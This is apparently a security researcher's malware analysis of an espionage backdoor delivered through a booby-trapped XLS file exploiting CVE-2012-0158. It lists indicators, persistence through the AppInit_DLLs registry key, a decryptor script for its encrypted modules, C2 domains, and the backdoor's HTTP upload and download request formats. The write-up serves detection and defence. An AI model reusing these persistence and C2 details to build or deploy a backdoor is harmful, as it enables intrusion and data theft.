After digging into some recent malicious XLS documents taking advantage of the tried and true CVE-2012-0158 exploit, I came upon some interesting malware, which appears to be actively targeting human rights activists and the automotive industry. Upon further inspection it appears that a number of recent domains and IP addresses are involved; however, at the time of this report only a few were active. In honor of our friends we decided to name this particular threat Grand Theft Auto (GTA) Panda, as they appear to be punching people in the face and stealing their cars. The malware used appears to extend as far back as early 2011 with earlier variants tracing back even further to 2010.
Technical Details
The XLS document was designed to lure victims in through a seemingly negative customer service review, which purported that the recipient had “Serious bad attitude to customers”.
Document Details:
MD5: CFC7254F36F9F0BD77B14218475E7112
File Size: 294,351Bytes
The document contained another encoded document within its body beginning at offset 0xBE00 as well as an encoded executable beginning at offset 0xF400. Both were encoded using the same scheme of a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as "%temp%\~tmp.xls" The outer document’s metadata was stripped from the file while the inner document contained the following metadata:
Inner Document Metadata:
Author: cool
Company: MC SYSTEM
Date Created: 5/29/2013 9:48AM
Date Last Saved: 5/29/2013 9:50AM
The dropper was actually a self-extracting 7zip archive, which contained two files that were responsible for the creation and installation of the backdoor and associated files.
SFX Dropper Details:
MD5: DD8499684DF9C314778E4DD858D049F5
File Size: 231,887 Bytes
Embedded 7zip Contents:
Filename: inst.exe
MD5: 0C856287C218C036B4EF08AD880EDEE9
File Size: 46,592 Bytes
Compile Time: 2/25/2013 9:03:04 UTC
Filename: sc.bin
MD5: 6B63CCEED30FED466E3FFA1D9E3D3D34
File Size: 190,775 Bytes
The “inst.exe” binary contained a debug path within the code “e:\SVN\Plat1\Release\Inst.pdb” which suggested it may be formally maintained in a standard SVN code repository. The file “sc.bin” contained shellcode as well as a larger DLL, which contained several additional PE files within a resource named “VERSION”. Interestingly, the DLL also contained the debug path “e:\SVN\Plat1\Release\Inst_dll.pdb”. The dropper, inst.exe, also had several routines to check for the presence of 22 popular Antivirus programs in the registry as well as specifically checking for the presence of a process named “zhudongfangyu.exe” which is part of the Chinese 360 Antivirus Suite. The “inst.exe” binary was designed solely to read in the contents of the file sc.bin in the same local path, allocate memory for it and copy the contents, and finally jump to the beginning of the shellcode. “sc.bin” contained the actual routines necessary to install and configure the backdoor appropriately.
Details of embedded DLL in sc.bin:
MD5: F9966C6AD4DC1A52811FAE63FD3ACA0D
File Size: 187,904 Bytes
Compile Time: 3/13/2013 6:26:42 UTC
File System Changes:
- %temp%\~tmp.xls
- %temp%\{Hex Character(s)}.tmp
- %userprofile%\Documents\My Document\Dtl.dat
- %userprofile%\Documents\My Document\glp.uin
- %allusersprofile%\Application Data\Intel\Data\Dtl.dat (Network Config)
- %allusersprofile%\Application Data\Intel\Data\glp.uin (General Config)
- %allusersprofile%\Application Data\Intel\Sernem12.dll (Backdoor)
- %allusersprofile%\Application Data\Intel\sig.dll
- %allusersprofile%\Application Data\Intel\qjrr.dat (Encrypted DLL)
- May Create %allusersprofile%\Application Data\Intel\qjss.dat
- May Create %allusersprofile%\Application Data\Intel\Wincwq12.dat
- May Create %allusersprofile%\Application Data\Intel\ittr.dat
- May Create %allusersprofile%\Application Data\Intel\epcnge.dat
- May Create Files in %allusersprofile%\Documents\My Document\utd_CE31\ with the extension .jpg or .bmp
Volatile Evidence:
- %temp%\7ZipSfx.000\sc.bin (shellcode deleted)
- %temp%\7ZipSfx.000\inst.exe (dropper deleted)
- %allusersprofile%\Application Data\Intel\~1 (temp file)
- Creates the mutex “Local\MU_ACBPIDS08”
- Creates the mutex “Local\MU_ACB08”
- Creates the mutex “Global\{A59CF429-D0DD-4207-88A1-04090680F714}”
- May create the mutexes:
- Global\{34748A26-4EAD-4331-B039-673612E8A5FC}
- Global\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
- Global\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
- Global\{A8859547-C62D-4e8b-A82D-BE1479C684C9}
Registry Changes:
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs -> %allusersprofile%\Application Data\Intel\Sernem12.dll
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs -> 1
Persistence Mechanism:
- AppInit_DLLs Key in the HKLM Hive:
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs which points to the loader %allusersprofile%\Application Data\Intel\Sernem12.dll
The backdoor established persistence via the DLL, “Sernem12.dll”, which was configured as an AppInit DLL on the system. In order to execute the backdoor immediately after exploitation, the attacker also included an export named “Run” which could be called from the command line via rundll32.exe. When the system is rebooted “Sernem12.dll” will subsequently be loaded into each application that is executed within the current logged on session. The debug path “E:\SVN\Plat1\Release\ResN.pdb” was left within the binary. Upon further inspection the DLL actually provided an extensible framework to load and execute additional encrypted modules; in this case “qjrr.dat” was a RC4 encrypted DLL which contained the backdoor functionality. It should be noted that multiple encrypted modules may be contained within the same local directory and loaded within the address space of Sernem12.dll.
00000000 72 58 96 74 39 37 39 31 32 36 00 00 00 00 00 00 rX–t979126...... 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040 00 00 00 00 00 04 01 00 E1 BB 96 9B AE 4E 3E A5 ........á»–›®N>¥
Figure 1: Header of Encrypted DAT File
The loader starts by checking that the first four bytes of the respective DAT file are “72 58 96 74” highlighted in green above. It then reads in the string that immediately follows the header up to 0x40 bytes and stores the value as the RC4 key, highlighted in grey in the figure above. The size of the encrypted data (0x10400 Bytes) is stored just before the start of the encrypted data at offset 0x44. The following python script can be used to decode these encrypted DAT files.
from Crypto.Cipher import ARC4 import sys,binascii,struct with open(sys.argv[1], 'rb') as bin: binary = bin.read() try: if binary[0:4] == binascii.unhexlify('72589674'): end = binary.find(binascii.unhexlify('00')) key = binary[4:end] size = struct.unpack("<I",binary[0x44:0x48])[0] encrypted_binary = binary[0x48:0x48+size] rc4 = ARC4.new(key) decrypted_binary = rc4.decrypt(encrypted_binary) if decrypted_binary: print 'Binary Successfully Decrypted: Wrote %s Bytes' % str(hex(size)) open(sys.argv[1]+'.dec','wb').write(decrypted_binary) else: print 'Header Structure Invalid' except: pass
Figure 2: Python Script to Decode Encrypted DAT Files
The decrypted “qjrr.dat” provided typical backdoor functionality and would allow the attacker to execute commands, enumerate system and drive information, manipulate processes, perform file management operations, and upload and download files. The backdoor contained a slightly different debug path from the previous binaries but the same drive letter, “E:\WORK\Project\T5000\Ver 1.51\Target\1.pdb”. The backdoor referenced two separate configuration files “.\Data\glp.uin” and “.\Data\Dtl.dat”. “glp.uin” was a generic unencrypted configuration file, which specified the encrypted plugins to load as well as document types of interest including .doc, .ppt, .xls, .docx, .xlsx, and .pptx. “Dtl.dat” contained the network configuration for the backdoor encoded with a single byte XOR against the byte 0x5F; the decoded network configuration block is shown in the figure below.
00000020 01 00 00 00 90 1F 00 00 00 00 00 00 74 73 72 76 ...........tsrv 00000030 61 6C 6C 2E 6D 69 63 72 6F 73 6F 66 74 2D 63 65 all.microsoft-ce 00000040 6E 74 72 65 2E 63 6F 6D 00 00 00 00 00 00 00 00 ntre.com........ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................ 000000B0 90 1F 00 00 00 00 00 00 74 73 72 76 61 6C 6C 30 .......tsrvall0 000000C0 31 2E 6E 6F 72 74 6F 6E 2D 75 70 64 61 74 65 2E 1.norton-update. 000000D0 63 6F 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 com............. 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000130 00 00 00 00 00 00 00 00
Figure 3: Decoded Network Configuration from "Dtl.dat"
Network Traffic Details and Detection
The backdoor may make DNS requests to "tsrvall.microsoft-centre.com" or "tsrvall01.norton-update.com". The backdoor will first attempt to connect to "tsrvall.microsoft-centre.com" on TCP port 8080 and if that fails it will attempt to communicate to tsrvall01.norton-update.com on TCP port 8080. Communication to these sites will be over TCP using either standard HTTP requests or a custom binary protocol.
00000000 65 75 65 75 1C 11 10 75 01 14 07 12 58 5F 6C 6D eueu...u....X_lm 00000010 66 64 67 75 65 75 05 01 16 75 64 60 65 65 75 66 fdgueu...ud`eeuf 00000020 65 66 65 6D 67 62 6D 75 66 6C 6D 61 60 62 66 62 efemgbmuflma`bfb 00000030 64 67 58 5F 6C 6D 66 64 67 75 65 75 01 14 07 75 dgX_lmfdgueu...u 00000040 64 65 65 65 65 75 67 63 65 65 75 65 65 6F 64 16 deeeeugceeueeod. 00000050 6F 61 67 6F 65 66 6F 64 66 6F 63 64 75 62 60 60 oagoefodfocdub`` 00000060 62 67 61 6C 65 58 5F 6C 6D 66 64 67 75 65 75 16 bgaleX_lmfdgueu. 00000070 1C 1B 75 64 65 66 66 75 03 32 17 1F 14 10 18 14 ..udeffu.2...... 00000080 03 14 17 1F 14 10 65 14 19 04 17 18 14 13 04 14 ......e......... 00000090 75 36 32 17 64 14 12 61 14 0F 14 17 26 14 12 22 u62.d..a....&.." 000000A0 14 18 22 14 2C 14 16 61 14 0F 04 17 61 14 12 00 ..".,..a....a... 000000B0 14 75 04 04 17 3E 14 12 65 14 34 04 17 20 14 12 .u...>..e.4.. .. 000000C0 3E 14 36 22 17 65 14 1D 1C 14 0C 04 17 65 14 12 >.6".e.......e.. 000000D0 6D 14 36 32 14 68 58 5F 6C 6D 66 64 67 75 65 75 m.62.hX_lmfdgueu 000000E0 05 19 1C 75 65 75 02 3C 3B 36 22 24 64 67 7B 31 ...ueu.<;6"$dg{1 000000F0 34 21 75 6D 75 65 75 65 75 7F 58 5F 6C 6D 66 64 4!umueueuX_lmfd 00000100 67 75 65 75 05 19 11 75 65 75 65 58 5F 6C 6D 66 gueu...ueueX_lmf 00000110 64 67 75 65 75 05 19 1C 75 64 75 24 3F 27 27 7B dgueu...udu$?''{ 00000120 31 34 21 75 64 6C 75 65 75 65 75 7F 58 5F 6C 6D 14!udlueueuX_lm 00000130 66 64 67 75 65 75 05 19 11 75 64 75 65 58 5F 6C fdgueu...udueX_l 00000140 6D 66 64 67 75 65 75 05 19 1C 75 67 75 24 3F 26 mfdgueu...ugu$?& 00000150 26 7B 31 34 21 75 65 75 65 75 65 75 7F 58 5F 6C &{14!ueueueuX_l 00000160 6D 66 64 67 75 65 75 05 19 11 75 67 75 64 60 67 mfdgueu...ugud`g 00000170 58 5F CD 55 55 55 B2 55 55 55 7D 55 55 55 75 55 X_ÍUUU²UUU}UUUuU 00000180 55 55 2D 28 F2 5C 54 55 55 55 55 55 75 56 1D 55 UU-(ò\TUUUUUuV.U 00000190 55 55 05 55 55 55 CD 28 F2 5C 93 0E 54 2D 6E 55 UU.UUUÍ(ò\“.T-nU 000001A0 B6 06 B1 1B 6E 55 05 55 34 55 26 55 26 55 22 55 ¶.±.nU.U4U&U&U"U 000001B0 3A 55 27 55 31 55 6E 55 55 55 7F 55 7B 55 31 55 :U'U1UnUUUU{U1U 000001C0 3A 55 36 55 6E 55 7F 55 7B 55 25 55 25 55 21 55 :U6UnUU{U%U%U!U 000001D0 6E 55 7F 55 7B 55 2D 55 39 55 26 55 6E 55 7F 55 nUU{U-U9U&UnUU 000001E0 7B 55 31 55 3A 55 36 55 2D 55 6E 55 7F 55 7B 55 {U1U:U6U-UnUU{U 000001F0 25 55 25 55 21 55 2D 55 6E 55 7F 55 7B 55 2D 55 %U%U!U-UnUU{U-U 00000200 39 55 26 55 2D 55 6E 55 55 55 6C 6D 66 64 67 75 9U&U-UnUUUlmfdgu 00000210 65 75 05 19 1C 75 66 75 3C 21 21 27 7B 31 34 21 eu...ufu<!!'{14! 00000220 75 65 75 65 75 65 75 30 2D 25 39 3A 27 30 27 7B ueueueu0-%9:'0'{ 00000230 30 2D 30 58 5F 6C 6D 66 64 67 75 65 75 05 19 11 0-0X_lmfdgueu... 00000240 75 66 75 64 65 67 58 5F 33 55 55 55 54 55 55 55 ufudegX_3UUUTUUU 00000250 54 55 55 55 55 55 75 56 05 55 55 55 7F 55 7B 55 TUUUUUuV.UUUU{U 00000260 31 55 3A 55 36 55 6E 55 7F 55 7B 55 25 55 25 55 1U:U6UnUU{U%U%U 00000270 21 55 6E 55 7F 55 7B 55 2D 55 39 55 26 55 6E 55 !UnUU{U-U9U&UnU 00000280 7F 55 7B 55 31 55 3A 55 36 55 2D 55 6E 55 7F 55 U{U1U:U6U-UnUU 00000290 7B 55 25 55 25 55 21 55 2D 55 6E 55 7F 55 7B 55 {U%U%U!U-UnUU{U 000002A0 2D 55 39 55 26 55 2D 55 6E 55 55 55 55 55 6C 6D -U9U&U-UnUUUUUlm 000002B0 66 64 67 75 65 75 05 19 1C 75 61 75 30 25 36 3B fdgueu...uau0%6; 000002C0 32 30 7B 31 34 21 75 65 75 65 75 65 75 30 2D 25 20{14!ueueueu0-% 000002D0 39 3A 27 30 27 7B 30 2D 30 58 5F 6C 6D 66 64 67 9:'0'{0-0X_lmfdg 000002E0 75 65 75 05 19 11 75 61 75 66 63 58 5F 71 55 55 ueu...uaufcX_qUU 000002F0 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU 00000300 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU 00000310 55 6C 6D 66 64 67 75 65 75 05 19 1C 75 65 58 5F Ulmfdgueu...ueX_
Figure 4: Example of Custom Binary Protocol
The information is transmitted encoded using a single byte XOR against the byte 0x55.
0 0 IDE TARG 98312 0 PTC 1500 30308278 3984573712 98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490 98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA= 98312 0 PLI 0 Wincwq12.dat 8 0 0 * 98312 0 PLD 0 0 98312 0 PLI 1 qjrr.dat 19 0 0 * 98312 0 PLD 1 0 98312 0 PLI 2 qjss.dat 0 0 0 * 98312 0 PLD 2 152 ---cut---
Figure 5: Partially Decoded TCP Packet
The contents of the current configuration file, "glp.uin", were also transmitted within the same session immediately following the information above. Several key pieces of information were transmitted in this first packet including the MAC address (green), a reversed decimal notation of the IP address (yellow), the system’s language identifier (blue), and a base64 encoded Unicode representation of the hostname, process the backdoor is executing within, and the username of the victim (grey). The base64 encoded string above decodes to "VICTIM-LT rundll32.exe Administrator". I didn’t delve too far into the command structure of the protocol itself but it appears to support up to 23 different commands which will perform a wide variety of common administrative tasks. File uploads and downloads appeared to use standard HTTP formatted requests similar to those in the figure below with a static User-Agent of "Mozilla/4.0 (compatible; MSIE 8.0; Win32)".
POST http://{hostname}:{port}/Service.asmx/%d HTTP/1.1 Accept: */* Host: {hostname}:{port} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Connection: Keep-Alive Content-Type: Appplication/octet-stream Content-Length: %d GET http://{hostname}:{port}/images/%d.asmx?%s HTTP/1.1 Accept: */* Host: {hostname}:{port} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Connection: Keep-Alive
Figure 6: Example HTTP Requests to Upload and Download Files
One interesting thing to note is that the content type header in the figure above contains an extra “p” which can readily be used to identify this type of traffic.
C2 Infrastructure
I was able to determine several additional subdomains and domain names used by this particular threat group based upon IP telemetry and similar domain parking techniques. The actor typically set only the "www" subdomain to resolve to a legitimate Microsoft IP address so basic browser-based checking of the domain would appear benign.
Additional Active and Parked Subdomains:
{CENSORED}.norton-update.com 255.255.255.255 download.norton-update.com 64.62.184.144 {CENSORED}.norton-update.com 64.62.184.144 support.norton-update.com 64.62.184.144 tsrvall.norton-update.com 64.62.184.144 {CENSORED}.microsoft-centre.com 255.255.255.255 office.microsoft-centre.com 64.62.184.144 o.microsoft-centre.com 192.154.96.153 v.microsoft-centre.com 255.255.255.255 www.microsoft-centre.com 64.4.11.42
The two domains utilized in the sample above used distinct registrant information and email addresses for each domain. Both domains were registered earlier this year at different times which suggests a departure from earlier registration techniques.
WHOIS information:
Domain Name: norton-update.com Registration Date: March 12, 2013 Registrant Contact: mikemike Email Address: mike.mike4789@gmail.com Address: L.A. L.A. Araucanía,432610 CL Telephone: +56.03478673201 Domain Name: microsoft-centre.com Registration Date: February 19, 2013 Registrant Contact: wei zhang Registrant Organization: zhang wei Email Address: mmhl@263.com Address: Qing Se Xiao Qu 5Dong 404 cheng du SC 314455 CN Telephone: 14532151311
I also found several older domains, which were all registered with the email address "huamulan2011@yahoo.com" in October of 2012 and 2011. I’ve intentionally removed subdomains specific to victim organizations.
all.mssupports.com 64.62.184.144 ohare.mssupports.com 255.255.255.255 orlando.mssupports.com 0.0.0.0 srv01.mssupports.com 64.62.184.144 update.mssupports.com 0.0.0.0 www.mssupports.com 64.4.11.37 support.mcaupdate.com 64.62.184.144 www.mcaupdate.com 64.62.184.144 support.mseupdate.com 64.62.184.144 www.mseupdate.com 65.55.81.30